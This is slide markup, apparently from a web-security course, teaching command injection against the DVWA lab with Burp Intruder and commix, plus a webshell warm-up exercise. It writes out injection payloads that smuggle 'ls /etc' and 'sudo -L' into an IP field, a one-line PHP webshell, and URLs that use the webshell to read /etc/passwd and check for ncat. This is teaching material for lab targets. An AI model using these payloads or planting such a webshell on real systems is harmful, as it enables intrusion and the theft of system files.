              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2382050"/>
            <a:ext cx="9144000" cy="2524500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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List the contents of `/etc`</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ip=8.8.8.8%20%26%20ls%20/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</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List the contents of `/home`</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ip=8.8.8.8%20%26%20ls%20/home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print the commands you can run with `sudo` (`sudo -L`)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.8.8%20%26sudo%20-L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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#3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;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Repeat the above exercise with Intruder, but redirect ping's output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/dev/null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.How do the responses differ?</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="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sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;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Loud Pipes Review #3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Repeat the above exercise with Intruder, but redirect ping's output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/dev/null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.How do the responses differ?</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;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5" name="Google Shape;1225;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1767325"/>
            <a:ext cx="9144000" cy="3139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FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>The response differ in that they omit the output from ping, and only include the output of the command we chose to run. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>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81"/>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Loud Pipes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5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1042" name="Google Shape;1042;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3" name="Google Shape;1043;p5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Webshell Warm-UP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concepts covered last class about Webshell.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Remote File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;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Google Shape;1246;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451200" y="1384150"/>
            <a:ext cx="5770200" cy="28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Servers can leak a lot of important information through errors.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;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8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Extracting Errors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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8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259" name="Google Shape;1259;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0" name="Google Shape;1260;p8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Extracting Error and Injecting Code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2&gt;&amp;1 to create a template payload and collect additional information from the serve.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Google Shape;1265;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6" name="Google Shape;1266;p87"/>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Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Errors </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="990000"/>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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Injecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Code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8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commix</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1272" name="Google Shape;1272;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8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Commix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> is a common tool used to automate command injection attacks. </a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1278" name="Google Shape;1278;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4" name="Google Shape;1284;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commix</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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90" name="Google Shape;1290;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1" name="Google Shape;1291;p9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Scanning with commix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commix to exploit DVWA, research new injection payloads, explore commix’s built-in “pseudo terminal”.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Google Shape;1048;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9" name="Google Shape;1049;p56"/>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Webshell Warm-Up</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7" name="Google Shape;1297;p92"/>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Scanning with Commix</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303" name="Google Shape;1303;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304" name="Google Shape;1304;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5" name="Google Shape;1305;p93"/>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Test for command injection vulnerabilities.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Bypass basic command injection filters. </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commix to automatically scan for command injection points.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="13262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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="17040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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="2123811"/>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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="141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Suppose the following PHP webshell lives at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php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&lt;?php</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echo</a:t>
            </a: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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>"command"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>?&gt;</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56" name="Google Shape;1056;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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2228850"/>
            <a:ext cx="9144000" cy="2677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t>How would you construct a URL to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump /etc/passwd?</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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine if ncat is installed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all files in the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="Google Shape;1063;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1410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Suppose the following PHP webshell lives at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php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&lt;?php</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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>"command"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="14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64" name="Google Shape;1064;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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2228850"/>
            <a:ext cx="9144000" cy="2677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How would you construct a URL to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump /etc/passwd?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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https://vulnerable.site/shell.php?command=cat%20/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine if ncat is installed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="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https://vulnerable.site/shell.php?command=ncat%20--version</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all files in the current directory?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php?command=ls</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
